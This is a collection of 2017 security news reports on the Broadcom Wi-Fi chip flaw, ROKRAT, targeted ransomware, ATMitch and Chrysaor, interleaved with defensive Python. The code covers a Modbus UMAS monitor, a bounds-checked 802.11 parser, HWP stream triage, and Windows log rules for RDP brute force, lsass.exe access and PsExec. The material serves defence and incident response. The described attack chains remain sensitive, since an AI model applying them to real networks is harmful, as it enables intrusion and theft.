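ADVISORY_FRAME = b"\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00"


def build_modbus_tcp(transaction_id, unit_id, function_code, data=b""):
    """Assemble an ADU: MBAP header + function code + data."""
    length = 1 + 1 + len(data)  # unit id + function code + data bytes
    mbap = struct.pack(">HHHB", transaction_id, 0, length, unit_id)
    return mbap + bytes([function_code]) + data


def parse_modbus_tcp(frame):
    """Decode an ADU into its fields; raise ValueError if it is malformed."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header plus function code")
    transaction_id, protocol_id, length, unit_id = struct.unpack(">HHHB", frame[:7])
    if protocol_id != 0:
        raise ValueError("protocol id %d is not Modbus" % protocol_id)
    if length != len(frame) - 6:
        raise ValueError("length field %d disagrees with %d bytes present"
                         % (length, len(frame) - 6))
    return {"transaction_id": transaction_id, "unit_id": unit_id,
            "function_code": frame[7], "data": frame[8:]}


def find_umas_requests(packets):
    """Monitoring check: from (src_ip, dst_port, payload) tuples, return the
    sources that sent a UMAS (0x5a) request to TCP/502. Any host that is not
    a known engineering workstation talking UMAS to a PLC deserves a look."""
    hits = []
    for src, dport, payload in packets:
        if dport != MODBUS_TCP_PORT:
            continue
        try:
            adu = parse_modbus_tcp(payload)
        except ValueError:
            continue
        if adu["function_code"] == FC_SCHNEIDER_UMAS:
            hits.append((src, adu["data"]))
    return hits


# Constructed traffic sample (not a real capture): one ordinary read-coils
# request from an HMI, the advisory's UMAS request from an unknown host,
# and an unrelated HTTP request that must be ignored.
SAMPLE_PACKETS = [
    ("10.0.0.20", 502, build_modbus_tcp(7, 1, 0x01, b"\x00\x00\x00\x08")),
    ("10.0.0.99", 502, ADVISORY_FRAME),
    ("10.0.0.99", 80, b"GET / HTTP/1.0\r\n\r\n"),
]

if __name__ == "__main__":
    print(parse_modbus_tcp(ADVISORY_FRAME))
    print(find_umas_requests(SAMPLE_PACKETS))
```

In a real network the packet tuples would come from a capture or a span port; the check is deliberately simple because on a plant network UMAS traffic should only ever originate from the engineering workstations, so a list of sources is already actionable.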


Download and install the last iOS 10.3.1, attackers can hack you over Wi-Fi
5.4.2017 securityaffairs Apple

A critical flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip”; download and install the latest release, iOS 10.3.1.
Last week, Apple released iOS 10.3, an important release of the popular operating system that fixed more than 100 bugs and implemented security improvements.

Apple has now pushed an emergency patch (iOS 10.3.1) that fixes some critical vulnerabilities, including one tracked as CVE-2017-6975. The flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip.”
The flaw was discovered by Gal Beniamini of Google’s Project Zero team; at the time of writing, neither he nor his team had disclosed technical details.

“Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip

Description: A stack buffer overflow was addressed through improved input validation.


CVE-2017-6975: Gal Beniamini of Google Project Zero” reads the security note published by Apple for the iOS 10.3.1 release.

CVE-2017-6975 affects iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later. Because the bug sits in the firmware of the Wi-Fi chip rather than in iOS itself, Apple’s list covers every model from the iPhone 5 onwards, regardless of whether the device has a 32-bit or a 64-bit application processor.

Beniamini is expected to publish a detailed technical analysis of the issue today, including a description of the attack scenario. The iOS 10.3.1 update can be downloaded via Settings → General → Software Update on your iOS device.
Apple users already running iOS 10.3 can install iOS 10.3.1 simply by pressing the “Download and Install” button.

If you are the owner of an Apple iPhone, iPad and iPod Touch you must update your device as soon as possible.


Millions Of Smartphones Using Broadcom Wi-Fi Chip Can Be Hacked Over-the-Air
5.4.2017 thehackernews Mobil


Millions of smartphones and smart gadgets, including Apple iOS and many Android handsets from various manufacturers, equipped with Broadcom Wifi chips are vulnerable to over-the-air hijacking without any user interaction.
Just yesterday, Apple rushed out an emergency iOS 10.3.1 update to address a serious bug that could allow an attacker on the same Wi-Fi network to remotely execute malicious code on the Broadcom Wi-Fi SoC (system-on-chip) used in iPhones, iPads and iPods.
The vulnerability, a stack buffer overflow, was discovered by Google Project Zero researcher Gal Beniamini, who today detailed his research in a lengthy blog post, noting that the flaw affects not only Apple but every device using Broadcom’s Wi-Fi stack.
Beniamini says the stack buffer overflow in the Broadcom firmware leads to remote code execution, allowing an attacker within the smartphone’s Wi-Fi range to send and execute code on the device.
Attackers with high skills can also deploy malicious code to take full control over the victim's device and install malicious apps, like banking Trojans, ransomware, and adware, without the victim's knowledge.
In his next blog post that's already on its way, Beniamini will explain how attackers can use their assumed control of the Wi-Fi SoC in order to further escalate their privileges into the application processor, taking over the host’s operating system.
Over-the-Air Broadcom Wi-Fi SoC Hack

According to the researcher, the firmware running on the Broadcom Wi-Fi SoC can be tricked into overrunning its stack buffers: by sending carefully crafted Wi-Fi frames carrying abnormal values to the Wi-Fi controller, he was able to overflow the firmware’s stack.
Beniamini then combined this with the chipset’s frequent timer firings to gradually overwrite specific chunks of the device’s memory (RAM) until his malicious code was executed.
So, to exploit the flaw, an attacker needs to be within the WiFi range of the affected device to silently take over it.
"While the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security," Beniamini explains. "Specifically, it lacks all basic exploit mitigations – including stack cookies, safe unlinking and access permission protection."
The researcher also detailed a proof-of-concept Wi-Fi remote code execution exploit in the blog post and successfully performed it on a then-fully updated (now fixed) Nexus 6P, running Android 7.1.1 version NUF26K – the latest available Nexus device at the time of testing in February.
The flaw is one of the several vulnerabilities discovered by Beniamini in the firmware version 6.37.34.40 of Broadcom Wi-Fi chips.
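The bug class described above is a length field taken from an attacker-controlled frame and trusted during a copy into a fixed-size stack buffer. The Python below is an added example, not Broadcom's firmware or Project Zero's exploit code: it parses the 802.11 information element format (one id byte, one length byte, then the value) with the bounds checks a safe parser needs, and models the copy-into-fixed-buffer step that the firmware got wrong. The specific frame and element Beniamini exploited are not named on this page, so a generic IE list is used; the frame bodies are constructed, and the 32-byte buffer size mirrors the maximum SSID length.

```python
"""Bounds-checked parser for 802.11 information elements (IEs).

Added example, not Broadcom's or Project Zero's code. The articles say the
Wi-Fi firmware copied attacker-controlled frame fields into stack buffers
without enough validation; the exact frame and element Beniamini used are
not named on this page, so a generic IE list (1-byte id, 1-byte length,
value) is used. In C the missing check turns an over-long element into a
stack buffer overflow; here it is the ValueError that a safe parser raises.
"""
from collections import namedtuple

IE = namedtuple("IE", "element_id value")

EID_SSID = 0
EID_SUPPORTED_RATES = 1
SSID_BUFFER_SIZE = 32  # the standard's maximum SSID length


def build_ie(element_id, value):
    """Encode one IE; the one-byte length field caps a value at 255 bytes."""
    if len(value) > 255:
        raise ValueError("IE value longer than 255 bytes")
    return bytes([element_id, len(value)]) + value


def parse_information_elements(body):
    """Walk the IE list, refusing any element that reaches past the frame."""
    ies, off = [], 0
    while off < len(body):
        if off + 2 > len(body):
            raise ValueError("truncated IE header at offset %d" % off)
        eid, elen = body[off], body[off + 1]
        end = off + 2 + elen
        if end > len(body):
            raise ValueError("IE %d declares %d bytes, only %d remain"
                             % (eid, elen, len(body) - off - 2))
        ies.append(IE(eid, body[off + 2:end]))
        off = end
    return ies


def copy_ie_into_buffer(ie, capacity):
    """Mirror of the firmware pattern: copy an IE value into a fixed-size
    buffer. The length comes from the frame, i.e. from the attacker, so it
    must be checked against the buffer size before the copy, not after."""
    if len(ie.value) > capacity:
        raise ValueError("IE %d (%d bytes) does not fit %d-byte buffer"
                         % (ie.element_id, len(ie.value), capacity))
    buf = bytearray(capacity)
    buf[:len(ie.value)] = ie.value
    return bytes(buf)


# Constructed frame body (not a captured frame): an SSID and a rates element.
SAMPLE_BODY = (build_ie(EID_SSID, b"corp-wifi")
               + build_ie(EID_SUPPORTED_RATES, b"\x82\x84\x8b\x96"))
# Same elements, but the SSID length byte claims 200 bytes that are not there.
TRUNCATED_BODY = (b"\x00\xc8" + b"corp-wifi"
                  + build_ie(EID_SUPPORTED_RATES, b"\x82\x84\x8b\x96"))
# A well-formed element whose value is larger than the SSID buffer; a copy
# routine that trusts the length byte overruns the buffer here.
OVERSIZED_SSID = parse_information_elements(build_ie(EID_SSID, b"A" * 200))[0]

if __name__ == "__main__":
    for ie in parse_information_elements(SAMPLE_BODY):
        print(ie)
    try:
        copy_ie_into_buffer(OVERSIZED_SSID, SSID_BUFFER_SIZE)
    except ValueError as exc:
        print("rejected:", exc)
```

Note that OVERSIZED_SSID is a perfectly well-formed frame: the length byte is consistent with the bytes present, so the first parser pass accepts it. The overflow only exists at the second step, where a fixed buffer is chosen by the implementer but the length is chosen by the sender; that is the check the two stages must each make independently.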
Security Patch for Nexus & iOS Released; Others Have to Wait!
Google Project Zero team reported the issue to Broadcom in December. Since the flaw is in Broadcom's code, smartphone makers had to wait for a patch from the chip vendor before testing the patch and pushing it out to their own user base.
Both Apple and Google addressed the vulnerability with security updates released on Monday, with Google delivering updates via its Android April 2017 Security Bulletin and Apple releasing the iOS 10.3.1 update.
The flaw still affects most Samsung flagship devices, including Galaxy S7 (G930F, G930V), Galaxy S7 Edge (G935F, G9350), Galaxy S6 Edge (G925V), Galaxy S5 (G900F), and Galaxy Note 4 (N910F), the researcher says.
For more technical details head on to the blog post published by Google Project Zero team today.


Wi-Fi Flaws Expose iPhone, Nexus Phones to Attacks

5.4.2017 securityweek Vulnerability

Vulnerabilities in Broadcom’s Wi-Fi system-on-chip (SoC) can be exploited to hijack iPhone, Nexus, Samsung and other smartphones without requiring any user interaction.

Google Project Zero researcher Gal Beniamini has identified several remote code execution, privilege escalation and information disclosure vulnerabilities in Broadcom firmware.

Since Broadcom’s Wi-Fi chips are widely used, the flaws affect many devices, including Google’s Nexus 5, 6 and 6P, all iPhones since iPhone 4, and most of Samsung’s flagship Android smartphones.

Beniamini has published a lengthy blog post describing the Broadcom Wi-Fi chipset and vulnerabilities that can be exploited for remote code execution. The researcher has also promised to publish another blog post that will provide details on the second part of the exploit chain, which involves elevating privileges from the SoC to the operating system’s kernel.

An attacker who is in Wi-Fi range can exploit the security holes found by the Google researcher to take complete control of a vulnerable device without any user interaction.

Beniamini applauded Broadcom’s response, stating that the company was responsive and helpful in fixing the vulnerabilities and making the patches available to affected device manufacturers.

The researcher said Broadcom’s firmware lacks all basic exploit mitigations, but the company claims newer versions do include some security mechanisms and exploit mitigations are being considered for future versions.

Apple released an emergency update this week for iOS to address the remote code execution vulnerability (CVE-2017-6975), but the company did not provide any details.

The Broadcom flaws were also patched in Android with the release of the April security updates.

Samsung has also released maintenance updates this week for its Android devices. The updates include both the Google patches and fixes for vulnerabilities specific to Samsung products.


South Korean users targeted with a new stealthy malware, the ROKRAT RAT
5.4.2017 securityaffairs Virus

Security experts at Cisco Talos have spotted a new, insidious remote access tool dubbed ROKRAT that implements sophisticated anti-detection measures.
The ROKRAT RAT targets Korean users, specifically people using Hangul Word Processor (HWP), a popular Korean alternative to Microsoft Word. In the past, we have seen other attacks against HWP users.

ROKRAT RAT

The ROKRAT RAT was used in a phishing campaign detected several weeks ago; the attackers leveraged weaponized documents sent as attachments.

“This actor is quick to cover their tracks and very quickly cleaned up their compromised hosts. We believe the compromised infrastructure was live for a mere matter of hours during any campaign,” reads the analysis published by Cisco Talos researchers Warren Mercer, Paul Rascagneres and Matthew Molyett.

The experts believe a sophisticated threat actor is involved, one that aimed to compromise the systems of users in the South Korean public sector.

The attackers sent phishing messages from an email address tied to South Korea’s Yonsei University on the topic of an upcoming and fictitious “Korean Reunification and North Korean Conference”.

The attackers compromised a legitimate email address of a big forum powered by a university in Seoul to send out spear phishing email.

The attackers tried to trick victims into opening the attachments in order to provide feedback to the conference organizers. The phishing emails carry two HWP documents, each embedding an Encapsulated PostScript (EPS) object.

“The purpose of the EPS is to exploit a well-known vulnerability (CVE-2013-0808) to download a binary disguised as a .jpg file. This file is decoded and finally an executable is launched: ROKRAT,” said researchers.

The EPS flaw, tracked as CVE-2013-0808, was discovered in 2013. It is a buffer overflow in the EPS viewer that can be exploited by attackers to execute arbitrary code on targeted machines.

“An HWP document is composed by OLE objects. In our case, it contains an EPS object named BIN0001.eps. As with all HWP documents the information is zlib compressed so you must decompress the .eps to get the true shellcode.” continues the analysis.

The shellcode is used to trigger the CVE-2013-0808 vulnerability and download the ROKRAT RAT binary from the command and control server. The binary is dropped as a .jpg file named “worker.jpg” or “kingstone.jpg”.
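The analysis above says the EPS object (BIN0001.eps) is stored zlib-compressed and must be inflated before the shellcode can be examined. The helper below is an added example, not Talos code: it takes the raw bytes of one OLE stream, inflates them, and checks whether the result is an EPS object. Extracting the stream from the HWP container itself needs an OLE parser such as olefile and is not shown. One assumption is labelled in the code: HWP 5 streams are normally raw DEFLATE without the two-byte zlib header, so both framings are handled. The sample EPS is constructed and contains no exploit.

```python
"""Inflate a compressed HWP stream and check whether it is an EPS object.

Added example, not from the Talos analysis. The analysis says the EPS object
(BIN0001.eps) inside the HWP file is zlib-compressed and must be inflated to
reach the shellcode. Extracting the OLE stream itself needs an OLE parser
(olefile, for instance) and is not shown; this starts from the raw stream
bytes. Assumption: HWP 5 streams are usually raw DEFLATE without the 2-byte
zlib header, so both framings are accepted. The sample EPS is constructed.
"""
import zlib

EPS_MAGIC = b"%!PS-Adobe"


def has_zlib_header(data):
    """True if the first two bytes form a valid zlib header (CM=8, FCHECK ok)."""
    return (len(data) >= 2 and data[0] & 0x0F == 8
            and ((data[0] << 8) | data[1]) % 31 == 0)


def inflate_hwp_stream(data):
    """Inflate a zlib-wrapped or raw-DEFLATE stream as stored in HWP files."""
    wbits = zlib.MAX_WBITS if has_zlib_header(data) else -zlib.MAX_WBITS
    try:
        return zlib.decompress(data, wbits)
    except zlib.error as exc:
        raise ValueError("stream does not inflate: %s" % exc)


def is_eps_object(blob):
    """EPS files announce themselves with a %!PS-Adobe ... EPSF comment line."""
    head = blob.lstrip()[:64]
    return head.startswith(EPS_MAGIC) and b"EPSF" in head


def triage_stream(data):
    """Return (is_eps, inflated_bytes) for one compressed OLE stream."""
    blob = inflate_hwp_stream(data)
    return is_eps_object(blob), blob


def deflate_raw(payload):
    """Produce raw DEFLATE (no zlib header), the framing HWP is assumed to use."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return comp.compress(payload) + comp.flush()


def deflate_zlib(payload):
    """Produce an ordinary zlib-wrapped stream, the other framing accepted."""
    return zlib.compress(payload)


# Constructed stand-in for BIN0001.eps (no exploit content).
SAMPLE_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n"
              b"%%BoundingBox: 0 0 100 100\n"
              b"/buf 256 string def\n"
              b"showpage\n")
SAMPLE_STREAM = deflate_raw(SAMPLE_EPS)

if __name__ == "__main__":
    is_eps, blob = triage_stream(SAMPLE_STREAM)
    print("EPS object:", is_eps, "size:", len(blob))
```

Once a stream inflates to an EPS object, the PostScript itself is what carries the CVE-2013-0808 trigger and the downloader; that content is analysed by hand (or in a sandboxed viewer), which is why the inflation step is worth automating across every embedded object in a suspicious document.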

If the malware detects a sandbox environment, it halts its activity and tries to deceive security researchers by generating fake traffic.

The malware appears to connect and load either an Amazon video of a game called “Men of War” or a Hulu anime video called “Golden Time”.

The security experts warned of similar attacks against other high-value targets; it is possible that threat actors will exploit the EPS vulnerability to target Microsoft Word users as well.

The experts also observed an evolution of the ROKRAT RAT: it now uses new communication channels, such as Twitter and the Yandex and Mediafire cloud platforms.

In this way, the attacker makes the malicious traffic harder to detect and also benefits from the HTTPS connectivity these services provide.

“This investigation shows us once again that South Korea interests sophisticated threat actors,” concludes the analysis.

“This campaign shows us a motivated malware actor. The usage of HWP (an application mainly used in Korea) and the fact that emails and documents are perfectly written in Korean suggests that the author is a native Korean speaker.”


Ransomware in targeted attacks
5.4.2017 Kaspersky Virus

Ransomware’s popularity has attracted the attention of cybercriminal gangs; they use these malicious programs in targeted attacks on large organizations in order to steal money. In late 2016, we detected an increase in the number of attacks, the main goal of which was to launch an encryptor on an organization’s network nodes and servers. This is due to the fact that organizing such attacks is simple, while their profitability is high:

The cost of developing a ransom program is significantly lower compared to other types of malicious software.
These programs entail a clear monetization model.
There is a wide range of potential victims.
Today, an attacker (or a group) can easily create their own encryptor without any special effort. A vivid example is the Mamba encryptor, which is based on DiskCryptor, an open source disk encryption utility. Some cybercriminal groups do not even take the trouble of involving programmers; instead, they use this legitimate utility “out of the box.”

DiskCryptor utility

The model of attack looks like this:

Search for an organization that has an unprotected server with RDP access.
Guess the password (or buy access on the black market).
Encrypt a node or server manually.
 

Notification about encrypting the organization’s server

The cost to organize such an attack is minimal, while the profit could reach thousands of dollars. Some partners of well-known encryptors resort to the same scheme. The only difference is the fact that, in order to encrypt the files, they use a version of a ransom program purchased from the group’s developer.

However, true professionals are also active on the playing field. They carefully select targets (major companies with a large number of network nodes), and organize attacks that can last weeks and go through several stages:

Searching for a victim
Studying the possibility of penetration
Penetrating the organization’s network by using exploits for popular software or Trojans on the infected network nodes
Gaining a foothold on the network and researching its topology
Acquiring the necessary rights to install the encryptor on all the organization’s nodes/servers
Installing the encryptor
Recently, we have written about one of these types of ransomware, PetrWrap, on our blog.
 

The screen of a machine infected with PetrWrap

Of special note is the software arsenal that a few groups use to penetrate and anchor themselves in an organization’s network. For example, one group used open source exploits for the server software running on the victim organization’s server. Once the attackers had exploited this vulnerability, they installed an open source RAT called Pupy on the system.
 

Pupy RAT description

Once they had gained a foothold in the victim network, the attackers used the Mimikatz tool to acquire the necessary access rights, and then installed the encryptor across the network using PsExec.
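Each step of the playbook described above leaves a distinct trace in Windows logs: password guessing against RDP produces runs of failed logons with logon type 10, Mimikatz's credential theft opens a handle to lsass.exe from an unexpected process, and PsExec installs a service named PSEXESVC on every host it touches. The detection rules below are an added example, not Kaspersky code. The events are constructed stand-ins for Security log (4625/4624), System log (7045) and Sysmon (event 10) records, reduced to the fields the rules read; the thresholds and the allow list of processes permitted to open lsass.exe are assumptions to be tuned per environment.

```python
"""Detection checks for the targeted-ransomware playbook described above:
RDP password guessing, Mimikatz-style credential theft and PsExec roll-out.

Added example, not Kaspersky code. The events are constructed stand-ins for
Windows Security log (4625/4624 with LogonType 10 = RemoteInteractive),
System log (7045 service installed) and Sysmon (event 10 process access)
records, reduced to the fields the rules need. Thresholds and the allow list
of processes that may open lsass.exe are assumptions to tune per estate.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# (timestamp, log source, event id, fields) - constructed, not real logs
SAMPLE_EVENTS = [
    ("2017-03-01 02:10:01", "Security", 4625, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "admin"}),
    ("2017-03-01 02:10:03", "Security", 4625, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "administrator"}),
    ("2017-03-01 02:10:04", "Security", 4625, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "administrator"}),
    ("2017-03-01 02:10:06", "Security", 4625, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "administrator"}),
    ("2017-03-01 02:10:09", "Security", 4625, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "administrator"}),
    ("2017-03-01 02:10:11", "Security", 4625, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "administrator"}),
    ("2017-03-01 02:11:30", "Security", 4624, {"LogonType": "10", "IpAddress": "203.0.113.7", "TargetUserName": "administrator"}),
    ("2017-03-01 02:25:40", "Sysmon", 10, {"SourceImage": "C:\\Users\\administrator\\AppData\\Local\\Temp\\m.exe",
                                           "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"}),
    ("2017-03-01 02:40:12", "System", 7045, {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe"}),
    ("2017-03-01 08:00:00", "Security", 4625, {"LogonType": "10", "IpAddress": "10.0.0.15", "TargetUserName": "jdoe"}),
    ("2017-03-01 08:00:20", "Security", 4624, {"LogonType": "10", "IpAddress": "10.0.0.15", "TargetUserName": "jdoe"}),
]


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Sources with >= threshold failed RDP logons inside `window`, plus
    whether the same source later had an RDP logon accepted."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, src, eid, f in events:
        if src != "Security" or f.get("LogonType") != "10":
            continue
        if eid == 4625:
            failures[f["IpAddress"]].append(_ts(ts))
        elif eid == 4624:
            successes[f["IpAddress"]].append(_ts(ts))
    findings = {}
    for ip, times in failures.items():
        times.sort()
        for i, start in enumerate(times):
            burst = [t for t in times[i:] if t - start <= window]
            if len(burst) >= threshold:
                later_ok = any(t >= burst[-1] for t in successes.get(ip, []))
                findings[ip] = {"failures": len(burst), "followed_by_success": later_ok}
                break
    return findings


def detect_psexec_service(events):
    """7045 entries whose service name or binary is PsExec's PSEXESVC."""
    return [f for ts, src, eid, f in events
            if src == "System" and eid == 7045
            and "PSEXESVC" in (f.get("ServiceName", "") + f.get("ImagePath", "")).upper()]


# Assumed allow list: system processes that legitimately open lsass.exe.
LSASS_READERS_ALLOWED = ("\\csrss.exe", "\\wininit.exe", "\\services.exe", "\\lsm.exe")


def detect_lsass_access(events, allowed=LSASS_READERS_ALLOWED):
    """Sysmon event 10 where an unexpected process opened lsass.exe, the
    pattern that Mimikatz's sekurlsa module produces."""
    suffixes = tuple(a.lower() for a in allowed)
    hits = []
    for ts, src, eid, f in events:
        if src != "Sysmon" or eid != 10:
            continue
        if not f.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        if f.get("SourceImage", "").lower().endswith(suffixes):
            continue
        hits.append(f["SourceImage"])
    return hits


if __name__ == "__main__":
    print(detect_rdp_bruteforce(SAMPLE_EVENTS))
    print(detect_psexec_service(SAMPLE_EVENTS))
    print(detect_lsass_access(SAMPLE_EVENTS))
```

The single failed logon from 10.0.0.15 is deliberately below threshold: a user mistyping a password once must not page anyone. The value of correlating the three rules is ordering: a brute-force success, then LSASS access, then PSEXESVC installs across many hosts is the sequence to treat as a live intrusion rather than three separate tickets.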

Considering the above, we can conclude that the scenario of ransomware infection in a target attack differs significantly from the usual infection scenario (malicious email attachments, drive-by-attacks, etc.). To ensure comprehensive security of an organization’s network, it is necessary to audit the software installed on all nodes and servers of the network. If any outdated software is discovered, then it should be updated immediately. Additionally, network administrators should ensure all types of remote access are reliably protected.

Of special note is the fact that, in most cases, the targets of these attacks are an organization’s servers, which means that servers need security measures of their own. In addition, backups must be created continuously and as a matter of course; this will help bring the company’s IT infrastructure back to operational mode quickly and with minimal financial loss.


ATMitch: remote administration of ATMs
5.4.2017 Kaspersky Virus

In February 2017, we published research on fileless attacks against enterprise networks. We described the data collected during incident response in several financial institutions around the world, exploring how attackers moved through enterprise networks leaving no traces on the hard drives. The goal of these attackers was money, and the best way to cash out and leave no record of transactions is through the remote administration of ATMs. This second paper is about the methods and techniques that were used by the attackers in the second stage of their attacks against financial organizations – basically enabling remote administration of ATMs.

In June 2016, Kaspersky Lab received a report from a Russian bank that had been the victim of a targeted attack. During the heist, the criminals were able to gain control of the ATMs and upload malware to them. After cashing out, the malware was removed. The bank’s forensics specialists were unable to recover the malicious executables because of the fragmentation of a hard drive after the attack, but they were able to restore the malware’s logs and some file names.

The bank’s forensic team were able, after careful forensic analysis of the ATM’s hard drive, to recover the following files containing logs:

C:\Windows\Temp\kl.txt
C:\logfile.txt
In addition, they were able to find the names of two deleted executables. Unfortunately, they were not able to recover any of the contents:

C:\ATM\!A.EXE
C:\ATM\IJ.EXE
Within the log files, the following pieces of plain text were found:

[Date – Time]
[%d %m %Y – %H : %M : %S] > Entering process dispense.
[%d %m %Y – %H : %M : %S] > Items from parameters converted successfully. 4 40
[%d %m %Y – %H : %M : %S] > Unlocking dispenser, result is 0
[%d %m %Y – %H : %M : %S] > Catch some money, bitch! 4000000
[%d %m %Y – %H : %M : %S] > Dispense success, code is 0

As mentioned in the previous paper, based on the information from the log file we created a YARA rule to find a sample, in this case: MD5 cef6c2aa78ff69d894903e41a3308452. And we’ve found one. This sample was uploaded twice (from Kazakhstan and Russia) as “tv.dll”.

 

The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker. If found, the malware reads the one character content from the file and executes the respective command:

‘O’ – Open dispenser
‘D’ – Dispense
‘I’ – Init XFS
‘U’ – Unlock XFS
‘S’ – Setup
‘E’ – Exit
‘G’ – Get Dispenser id
‘L’ – Set Dispenser id
‘C’ – Cancel
After execution, ATMitch writes the results of this command to the log file and removes “command.txt” from the ATM’s hard drive.
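The log fragments recovered from the ATM are also what let the authors write the YARA rule that found the sample. The Python below is an added example, not Kaspersky's rule or code: it parses log lines laid out per the template shown above ([%d %m %Y – %H : %M : %S] > message), groups them into dispense cycles so a responder can total what the dispenser was told to pay out, and scans an arbitrary blob for the fixed log strings in the same spirit as that YARA rule. The sample log lines are constructed from the template, not recovered from the bank's ATM, and the amount figure is carried through as logged without assuming its unit.

```python
"""Parser and string scanner for the ATMitch dispense log described above.

Added example, not Kaspersky's YARA rule or code. The log layout follows the
template on this page ([%d %m %Y – %H : %M : %S] > message); the sample
lines are constructed from it, not recovered from the bank's ATM, and the
amount figure is carried through as logged without assuming its unit.
"""
import re
from datetime import datetime

LINE_RE = re.compile(r"^\[(\d{2}) (\d{2}) (\d{4}) [–-] (\d{2}) : (\d{2}) : (\d{2})\] > (.*)$")
AMOUNT_RE = re.compile(r"Catch some money, bitch! (\d+)")
RESULT_RE = re.compile(r"Dispense success, code is (\d+)")

# Strings the log template fixes; a file containing several is worth a look
# (the same idea as the YARA rule the authors built from the recovered log).
ATMITCH_LOG_STRINGS = (
    b"Entering process dispense.",
    b"Items from parameters converted successfully.",
    b"Unlocking dispenser, result is",
    b"Catch some money, bitch!",
    b"Dispense success, code is",
)

# Constructed sample following the template; two dispense cycles plus noise.
SAMPLE_LOG = """\
[02 06 2016 – 03 : 14 : 07] > Entering process dispense.
[02 06 2016 – 03 : 14 : 07] > Items from parameters converted successfully. 4 40
[02 06 2016 – 03 : 14 : 08] > Unlocking dispenser, result is 0
[02 06 2016 – 03 : 14 : 09] > Catch some money, bitch! 4000000
[02 06 2016 – 03 : 14 : 15] > Dispense success, code is 0
[02 06 2016 – 03 : 16 : 01] > Entering process dispense.
[02 06 2016 – 03 : 16 : 01] > Items from parameters converted successfully. 4 25
[02 06 2016 – 03 : 16 : 02] > Unlocking dispenser, result is 0
[02 06 2016 – 03 : 16 : 03] > Catch some money, bitch! 2500000
[02 06 2016 – 03 : 16 : 09] > Dispense success, code is 0
this line is not from the malware
"""


def parse_log(text):
    """Return (timestamp, message) for every line matching the template."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d, mo, y, h, mi, s = (int(x) for x in m.groups()[:6])
        entries.append((datetime(y, mo, d, h, mi, s), m.group(7)))
    return entries


def dispense_cycles(entries):
    """Group entries into dispense cycles; each cycle records the logged
    amount and the result code, so a responder can total what left the safe."""
    cycles, current = [], None
    for ts, msg in entries:
        if msg.startswith("Entering process dispense"):
            current = {"started": ts, "amount": None, "code": None}
            cycles.append(current)
        elif current is None:
            continue
        elif AMOUNT_RE.search(msg):
            current["amount"] = int(AMOUNT_RE.search(msg).group(1))
        elif RESULT_RE.search(msg):
            current["code"] = int(RESULT_RE.search(msg).group(1))
    return cycles


def total_dispensed(cycles):
    """Sum the logged amount over cycles that reported result code 0."""
    return sum(c["amount"] or 0 for c in cycles if c["code"] == 0)


def scan_for_log_strings(blob):
    """Return which ATMitch log strings a binary or file contains."""
    return [s.decode() for s in ATMITCH_LOG_STRINGS if s in blob]


if __name__ == "__main__":
    cycles = dispense_cycles(parse_log(SAMPLE_LOG))
    for c in cycles:
        print(c)
    print("total:", total_dispensed(cycles))
```

The scanner is a starting point for a sweep of other ATMs in the same estate: the executables were deleted, but, as this case shows, the log strings survive in slack space and in the DLL itself, and a hit on two or more of them is a strong enough signal to pull the disk.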

The sample “tv.dll” successfully retrieved in this case does not try to conceal itself within the system.

 

The malware’s command parser

The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).

Unfortunately, we were unable to retrieve the executables (!A.exe and IJ.exe, located in C:\ATM) from the ATM; only the file names were found as artefacts during the forensic analysis. We assume that these are the installer and uninstaller of the malware. It should also be noted that “tv.dll” contained one Russian-language resource.

Kaspersky Lab continues to monitor and track these kinds of threats and reiterates the need for whitelisting in ATMs as well as the use of anti-APT solutions in banking networks.


Android Chrysaor spyware went undetected for years
5.4.2017 securityaffairs Android

Chrysaor is an Android surveillance malware that remained undetected for at least three years; NSO Group Technologies is suspected to be its author.
Security experts at Google and Lookout have spotted Chrysaor, an Android version of one of the most sophisticated mobile spyware families known, which remained undetected for at least three years thanks to its self-destruction capabilities, the same capabilities that made the threat hard to analyse. The Chrysaor spyware has been found installed on fewer than three dozen Android devices.
Chrysaor was used in targeted attacks against journalists and activists, mostly located in Israel; other victims were in Georgia, Turkey, Mexico, the UAE and other countries. Experts believe the Chrysaor Android malware was developed by the Israeli surveillance firm NSO Group Technologies, the company we encountered when researchers spotted its Pegasus iOS spyware in the wild.
The Chrysaor Android spyware implements several features including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection
The surveillance firm NSO Group Technologies sells surveillance technology to governments and law enforcement agencies worldwide, but privacy advocates and activists accuse the firm of also selling its malware to dictatorial regimes.

“Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps,” reads a blog post published by Google.

